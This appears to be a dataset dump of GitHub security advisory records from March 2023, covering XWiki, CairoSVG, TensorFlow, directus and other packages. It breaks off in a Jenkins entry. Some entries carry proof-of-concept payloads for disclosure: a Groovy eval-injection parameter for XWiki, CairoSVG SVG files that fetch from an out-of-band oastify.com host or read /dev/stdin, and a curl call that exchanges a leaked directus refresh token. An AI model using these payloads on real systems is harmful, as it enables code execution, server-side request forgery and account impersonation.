schema_version
stringclasses
1 value
id
stringlengths
19
19
modified
stringlengths
20
20
published
stringlengths
20
20
withdrawn
stringlengths
20
20
aliases
stringlengths
2
20
summary
stringlengths
20
140
details
stringlengths
56
37.2k
severity
stringlengths
2
92
affected
stringlengths
88
7.07k
references
stringlengths
139
4.72k
database_specific
stringlengths
131
185
1.4.0
GHSA-qxjg-jhgw-qhrv
2023-03-08T17:18:33Z
2023-03-08T17:18:33Z
null
['CVE-2023-27479']
org.xwiki.platform:xwiki-platform-panels-ui vulnerable to Eval Injection
### Impact Any user with view rights can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of UIX parameters A proof of concept exploit is to log in, add an `XWiki.UIExtensionClass` xobject to the user profile page, with an Extension Parameters content of: ``` order=100 label={{/html}} {{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("Hello " + "from groovy!"){{/groovy}}{{/async}} icon=icon:pencil target=XWiki.username ``` Then, navigating to `PanelsCode.ApplicationsPanelConfigurationSheet` (i.e., `<xwiki-host>/xwiki/bin/view/PanelsCode/ApplicationsPanelConfigurationSheet` where `<xwiki-host>` is the URL of your XWiki installation) should not execute the Groovy script. If it does, you will see `Hello from groovy!` displayed on the screen. ### Patches The vulnerability has been patched in XWiki 13.10.11, 14.4.7 and 14.10-rc-1 ### Workarounds The issue can be fixed by editing the `PanelsCode.ApplicationsPanelConfigurationSheet` wiki page and making the same modifications as shown in the [patch](https://github.com/xwiki/xwiki-platform/commit/6de5442f3c91c3634a66c7b458d5b142e1c2a2dc) for this issue. ### References * https://github.com/xwiki/xwiki-platform/commit/6de5442f3c91c3634a66c7b458d5b142e1c2a2dc * https://jira.xwiki.org/browse/XWIKI-20294 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-panels-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.3-milestone-2'}, {'fixed': '13.10.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-panels-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0'}, {'fixed': '14.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-panels-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10-rc-1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-qxjg-jhgw-qhrv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27479'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/6de5442f3c91c3634a66c7b458d5b142e1c2a2dc'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20294'}]
{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:18:33Z', 'nvd_published_at': '2023-03-07T19:15:00Z'}
1.4.0
GHSA-h828-v5pv-33qx
2023-03-14T19:39:27Z
2023-03-03T18:30:27Z
null
['CVE-2022-2837']
coreDNS vulnerable to Improper Restriction of Communication Channel to Intended Endpoints
A flaw was found in coreDNS. This flaw allows a malicious user to redirect traffic intended for external top-level domains (TLD) to a pod they control by creating projects and namespaces that match the TLD.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/coredns/coredns'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.9.3'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-2837'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2118543'}, {'type': 'PACKAGE', 'url': 'https://github.com/coredns/coredns'}]
{'cwe_ids': ['CWE-601', 'CWE-923'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-06T21:43:07Z', 'nvd_published_at': '2023-03-03T16:15:00Z'}
1.4.0
GHSA-fqm2-gh8w-gr68
2023-03-27T22:02:10Z
2023-03-24T21:57:09Z
null
['CVE-2023-25667']
TensorFlow vulnerable to segfault when opening multiframe gif
### Impact Integer overflow occurs when 2^31 <= num_frames * height * width * channels < 2^32, for example Full HD screencast of at least 346 frames. ```python import urllib.request dat = urllib.request.urlopen('https://raw.githubusercontent.com/tensorflow/tensorflow/1c38ad9b78ffe06076745a1ee00cec42f39ff726/tensorflow/core/lib/gif/testdata/3g_multiframe.gif').read() import tensorflow as tf tf.io.decode_gif(dat) ``` ### Patches We have patched the issue in GitHub commit [8dc723fcdd1a6127d6c970bd2ecb18b019a1a58d](https://github.com/tensorflow/tensorflow/commit/8dc723fcdd1a6127d6c970bd2ecb18b019a1a58d). The fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1 ### For more information Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. ### Attribution This vulnerability has been reported by Andrei
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-fqm2-gh8w-gr68'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25667'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/8dc723fcdd1a6127d6c970bd2ecb18b019a1a58d'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]
{'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T21:57:09Z', 'nvd_published_at': '2023-03-25T00:15:00Z'}
1.4.0
GHSA-42c3-wvww-gcqj
2023-03-22T18:36:47Z
2023-03-22T18:36:47Z
null
['CVE-2023-1578']
Pimcore Remote Code Execution vulnerability in Search function
### Impact Attacker can get full DB and maybe RCE knowing the WEBROOT path ### Patches Update to version 10.5.19 or apply this patch manually https://github.com/pimcore/pimcore/commit/367b74488808d71ec3f66f4ca9e8df5217c2c8d2.patch ### Workarounds Apply patch https://github.com/pimcore/pimcore/commit/367b74488808d71ec3f66f4ca9e8df5217c2c8d2.patch manually. ### References #14538
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.19'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-42c3-wvww-gcqj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1578'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14538'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/367b74488808d71ec3f66f4ca9e8df5217c2c8d2'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/7e441a14-8e55-4ab4-932c-4dc56bb1bc2e/'}]
{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-22T18:36:47Z', 'nvd_published_at': '2023-03-22T16:15:00Z'}
1.4.0
GHSA-rwmf-w63j-p7gv
2023-03-20T21:27:15Z
2023-03-20T21:27:15Z
null
['CVE-2023-27586']
CairoSVG improperly processes SVG files loaded from external resources
# SSRF vulnerability ## Summary When CairoSVG processes an SVG file, it can make requests to the inner host and different outside hosts. ## Operating system, version and so on Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9 ## Tested CairoSVG version 2.6.0 ## Details A specially crafted SVG file that loads an external resource from a URL. Remote attackers could exploit this vulnerability to cause a scan of an organization's internal resources or a DDOS attack on external resources. It looks like this bug can affect websites and cause request forgery on the server. ## PoC 1. Generating malicious svg file: 1.1 CairoSVG_exploit.svg: ```svg <?xml version="1.0" standalone="yes"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <image height="200" width="200" xlink:href="http://[jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com](http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/)/3" /> <style type="text/css">@import url("http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com/5");</style> <style type="text/css"> <![CDATA[ @import url("http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/9"); rect { fill: red; stroke: blue; stroke-width: 3 } ]]> </style> </svg> ``` 1.2 CairoSVG_exploit_2.svg: ```svg <?xml version="1.0" standalone="yes"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <defs> <pattern id="img1" patternUnits="userSpaceOnUse" width="600" height="450"> <image xlink:href="http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/11" x="0" y="0" width="600" height="450" /> </pattern> </defs> <path d="M5,50 l0,100 l100,0 l0,-100 l-100,0 M215,100 a50,50 0 1 1 -100,0 50,50 0 1 1 100,0 M265,50 l50,100 l-100,0 l50,-100 z" fill="url(#img1)" /> </svg> ``` 1.3 CairoSVG_exploit_3.svg: ```svg <?xml version="1.0" standalone="yes"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <use href="http://jzm72frk1jng4ametta5bpyn0e65uvik.oastify.com:80/13" /> </svg> ``` 2. Run some commands: `$ python3 -m cairosvg CairoSVG_exploit.svg -f png` `$ python3 -m cairosvg CairoSVG_exploit_2.svg -f png` `$ python3 -m cairosvg CairoSVG_exploit_3.svg -f png ` 3. See result requests in Burp Collaborator: ![1](https://user-images.githubusercontent.com/952243/224340068-547b1d9a-5513-48a5-9cdf-b34b693f80c2.png) # DOS vulnerability with SSTI ## Summary When CairoSVG processes an SVG file, it can send requests to external hosts and wait for a response from the external server after a successful TCP handshake. This will cause the server to hang. It seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server. ## Operating system, version and so on Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9 ## Tested CairoSVG version 2.6.0 ## PoC 1. Generating malicious svg file: ```svg <?xml version="1.0" standalone="yes"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <use href="http://192.168.56.1:1234/" /> </svg> ``` 2. In other server run this python program: ```python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', 1234)) s.listen(1) conn, addr = s.accept() with conn: while True: data = conn.recv(2048) s.close() ``` 3. Run commands: `$timeout 60 python3 -m cairosvg CairoSVG_exploit_dos.svg -f png` (without timeout server will hang forever) # DOS vulnerability with stdin file descriptor ## Summary Specially crafted SVG file that opens /proc/self/fd/1 or /dev/stdin results in a hang with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted SVG file. It seems this bug can affect websites or servers and cause a complete freeze while uploading this PoC file to the server. ## Operating system, version and so on Linux, Debian (Buster) LTS core 5.10 / Parrot OS 5.1 (Electro Ara), python 3.9 ## Tested CairoSVG version 2.6.0 ## PoC 1. Generating malicious svg file: ```svg <?xml version="1.0" standalone="yes"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"> <use href="file:///dev/stdin" /> </svg> ``` 2. In other server run this python program: ```python import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('0.0.0.0', 1234)) s.listen(1) conn, addr = s.accept() with conn: while True: data = conn.recv(2048) s.close() ``` 3. Run commands: `$timeout 60 python3 -m cairosvg cariosvg_exploit_dos.svg -f png`
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'CairoSVG'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.7.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/Kozea/CairoSVG/security/advisories/GHSA-rwmf-w63j-p7gv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27586'}, {'type': 'WEB', 'url': 'https://github.com/Kozea/CairoSVG/commit/12d31c653c0254fa9d9853f66b04ea46e7397255'}, {'type': 'WEB', 'url': 'https://github.com/Kozea/CairoSVG/commit/33007d4af9195e2bfb2ff9af064c4c2d8e4b2b53'}, {'type': 'PACKAGE', 'url': 'https://github.com/Kozea/CairoSVG'}, {'type': 'WEB', 'url': 'https://github.com/Kozea/CairoSVG/releases/tag/2.7.0'}]
{'cwe_ids': ['CWE-20', 'CWE-918'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-20T21:27:15Z', 'nvd_published_at': '2023-03-20T16:15:00Z'}
1.4.0
GHSA-58g2-vgpg-335q
2023-04-07T22:47:43Z
2023-03-31T21:30:39Z
null
['CVE-2023-27163']
request-baskets vulnerable to Server-Side Request Forgery
request-baskets up to v1.2.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /api/baskets/{name}. This vulnerability allows attackers to access network resources and sensitive information via a crafted API request.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'Go', 'name': 'github.com/darklynx/request-baskets'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.2.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-27163'}, {'type': 'WEB', 'url': 'https://gist.github.com/b33t1e/3079c10c88cad379fb166c389ce3b7b3'}, {'type': 'PACKAGE', 'url': 'https://github.com/darklynx/request-baskets'}, {'type': 'WEB', 'url': 'https://notes.sjtu.edu.cn/s/MUUhEymt7'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/174128/Request-Baskets-1.2.1-Server-Side-Request-Forgery.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/174129/Maltrail-0.53-Remote-Code-Execution.html'}, {'type': 'WEB', 'url': 'http://request-baskets.com'}]
{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-31T22:44:28Z', 'nvd_published_at': '2023-03-31T20:15:00Z'}
1.4.0
GHSA-6hcf-g6gr-hhcr
2023-03-24T22:01:23Z
2023-03-24T22:01:23Z
null
[]
`openssl` `X509Extension::new` and `X509Extension::new_nid` null pointer dereference
These functions would crash when the context argument was None with certain extension types. Thanks to David Benjamin (Google) for reporting this issue.
[]
[{'package': {'ecosystem': 'crates.io', 'name': 'openssl'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.9.7'}, {'fixed': '0.10.48'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/sfackler/rust-openssl/pull/1854'}, {'type': 'PACKAGE', 'url': 'https://github.com/sfackler/rust-openssl'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0024.html'}]
{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T22:01:23Z', 'nvd_published_at': None}
1.4.0
GHSA-9hhc-pj4w-w5rv
2023-09-26T13:59:05Z
2023-03-01T17:38:56Z
null
['CVE-2022-4137']
Keycloak Cross-site Scripting on OpenID connect login service
A reflected cross-site scripting (XSS) vulnerability was found in the `oob` OAuth endpoint due to incorrect null-byte handling. This issue allows a malicious link to insert an arbitrary URI into a Keycloak error page.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-parent'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '20.0.5'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/security/advisories/GHSA-9hhc-pj4w-w5rv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-4137'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/pull/16774'}, {'type': 'WEB', 'url': 'https://github.com/keycloak/keycloak/commit/30d0e9d22dae51392e5a3748a1c68c116667359a'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1043'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1044'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1045'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2023:1049'}, {'type': 'WEB', 'url': 'https://access.redhat.com/security/cve/CVE-2022-4137'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2148496'}, {'type': 'PACKAGE', 'url': 'https://github.com/keycloak/keycloak'}]
{'cwe_ids': ['CWE-116', 'CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-01T17:38:56Z', 'nvd_published_at': None}
1.4.0
GHSA-8fww-64cx-x8p5
2023-04-06T22:55:38Z
2023-03-26T21:30:23Z
null
['CVE-2023-28859']
redis-py Race Condition due to incomplete fix
redis-py through 4.5.3 and 4.4.3 leaves a connection open after canceling an async Redis command at an inopportune time (in the case of a non-pipeline operation), and can send response data to the client of an unrelated request. NOTE: this issue exists because of an incomplete fix for CVE-2023-28858.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'redis'}, 'ecosystem_specific': {'affected_functions': ['redis.asyncio.client.Pipeline']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.5.0'}, {'fixed': '4.5.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'redis'}, 'ecosystem_specific': {'affected_functions': ['redis.asyncio.client.Pipeline']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.4.4'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28859'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/issues/2665'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/pull/1899'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/pull/2641'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/pull/2666'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/pull/2671'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/commit/66a4d6b2a493dd3a20cc299ab5fef3c14baad965'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/commit/b3c89acd0ffe8303649ad8207bc911b1d6a033eb'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/redis/PYSEC-2023-46.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/redis/redis-py'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/releases/tag/v4.4.4'}, {'type': 'WEB', 'url': 'https://github.com/redis/redis-py/releases/tag/v4.5.4'}]
{'cwe_ids': ['CWE-459'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-27T21:31:52Z', 'nvd_published_at': '2023-03-26T19:15:00Z'}
1.4.0
GHSA-8vg2-wf3q-mwv7
2023-03-31T16:08:10Z
2023-03-23T19:47:12Z
null
['CVE-2023-28443']
directus vulnerable to Insertion of Sensitive Information into Log File
### Summary CWE-532: Insertion of Sensitive Information into Log File discovered in v9.23.1. The `directus_refresh_token` is not redacted properly from the log outputs and can be used to impersonate users without their permission. ### Details Using `v9.23.1`, I am seeing that the `directus_refresh_token` is not properly redacted as indicated by https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13 I'm classifying this as a security vulnerability because if someone has access to the log outputs, for example with a shared Cloud account or Splunk implementation, they could exchange the refresh token using `/auth/refresh` for an access token and use the token to perform actions on behalf of an unsuspecting user. This situation creates issues with accountability and non-repudiation because we can no longer have confidence that actions taken in the application were authorized or even performed by the logged-in user. A couple of examples of this are: - A disgruntled employee deletes all of the data to get even with a target team member before logging off on their last day - Under the guise of their unsuspecting boss, a mischievous engineer uploads _questionable_ images that get displayed on internal or external facing content sites The list could go on but I think these communicate the risk of an internal threat that has access to this information 😆 ### PoC 1. Set `LOG_STYLE="raw"` and run Directus v9.23.1 1. Log in to the application 1. Look at the shell output and see that `directus_refresh_token` is logged > Note: This is different from the standard `raw` output format. I intentionally ran this with `npx directus start | pino-pretty` so logs would be easier to read. It can also be reproduced by running `npx directus start` alone. ![image](https://user-images.githubusercontent.com/13325146/224877190-54e12d7e-3c3e-42d3-9e21-0bd4439f4f44.png) 1. Exchange the `directus_refresh_token` for an `access_token` ``` shell curl -X POST \ 'http://0.0.0.0:8055/auth/refresh' \ --header 'Accept: */*' \ --header 'Cookie: directus_refresh_token=$shh' ``` ### Impact Because this can be used to exploit other threats related to [CWE-284: Improper Access Control](https://cwe.mitre.org/data/definitions/284.html) I rank it with a Moderate severity. An insider with knowledge of this could do many mischievous things and get away with them for a long time without victims knowing about it.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'directus'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.23.3'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/directus/directus/security/advisories/GHSA-8vg2-wf3q-mwv7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28443'}, {'type': 'WEB', 'url': 'https://github.com/directus/directus/commit/349536303983ccba68ecb3e4fb35315424011afc'}, {'type': 'PACKAGE', 'url': 'https://github.com/directus/directus'}, {'type': 'WEB', 'url': 'https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13'}]
{'cwe_ids': ['CWE-284', 'CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T19:47:12Z', 'nvd_published_at': '2023-03-24T00:15:00Z'}
1.4.0
GHSA-9324-jv53-9cc8
2023-03-21T22:41:11Z
2023-03-21T22:41:11Z
null
['CVE-2021-31402']
dio vulnerable to CRLF injection with HTTP method string
### Impact The dio package 4.0.0 for Dart allows CRLF injection if the attacker controls the HTTP method string, a different vulnerability than CVE-2020-35669. ### Patches The vulnerability has been resolved by https://github.com/cfug/dio/commit/927f79e93ba39f3c3a12c190624a55653d577984, and included since v5.0.0. ### Workarounds Cherry-pick the commit to your own fork can resolves the vulberability too. ### References - https://nvd.nist.gov/vuln/detail/CVE-2021-31402 - https://osv.dev/GHSA-jwpw-q68h-r678 - https://github.com/cfug/dio/issues/1130 - https://github.com/cfug/dio/issues/1752
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'Pub', 'name': 'dio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/cfug/dio/security/advisories/GHSA-9324-jv53-9cc8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-31402'}, {'type': 'WEB', 'url': 'https://github.com/cfug/dio/issues/1752'}, {'type': 'WEB', 'url': 'https://github.com/flutterchina/dio/issues/1130'}, {'type': 'WEB', 'url': 'https://github.com/cfug/dio/commit/927f79e93ba39f3c3a12c190624a55653d577984'}, {'type': 'PACKAGE', 'url': 'https://github.com/cfug/dio'}, {'type': 'WEB', 'url': 'https://osv.dev/GHSA-jwpw-q68h-r678'}]
{'cwe_ids': ['CWE-74', 'CWE-88', 'CWE-93'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-21T22:41:11Z', 'nvd_published_at': None}
1.4.0
GHSA-6rfv-h5v8-cj7g
2023-04-07T21:33:30Z
2023-03-31T21:30:37Z
null
['CVE-2023-1784']
jeecg-boot vulnerable to improper authentication
A vulnerability was found in jeecg-boot 3.5.0 that affects some unknown processing of the component API Documentation. The manipulation leads to improper authentication because the software does not prove or insufficiently proves that an identity claim is correct when an actor claims to have a given identity. The attack may be initiated remotely and the exploit has been disclosed to the public and may be used.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.jeecgframework.boot:jeecg-boot-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '3.5.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1784'}, {'type': 'PACKAGE', 'url': 'https://github.com/jeecgboot/jeecg-boot/'}, {'type': 'WEB', 'url': 'https://note.youdao.com/ynoteshare/index.html?id=7eb8fc804ea3544d8add43749a09173e'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.224699'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.224699'}]
{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-07T21:33:30Z', 'nvd_published_at': '2023-03-31T20:15:00Z'}
1.4.0
GHSA-7q9c-f2v8-j8gw
2023-04-06T22:56:35Z
2023-03-31T03:30:31Z
null
['CVE-2023-1760']
phpMyFAQ Stored Cross-site Scripting vulnerability
Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.12.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.12'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1760'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/56295b54062a284020fccce12a5044f9fa7d2770'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpmyfaq'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/2d0ac48a-490d-4548-8d98-7447042dd1b5'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-31T22:42:21Z', 'nvd_published_at': '2023-03-31T02:15:00Z'}
1.4.0
GHSA-frgr-c5f2-8qhh
2023-05-23T20:46:25Z
2023-03-10T21:30:19Z
null
['CVE-2023-27900']
Denial of service in Jenkins Core
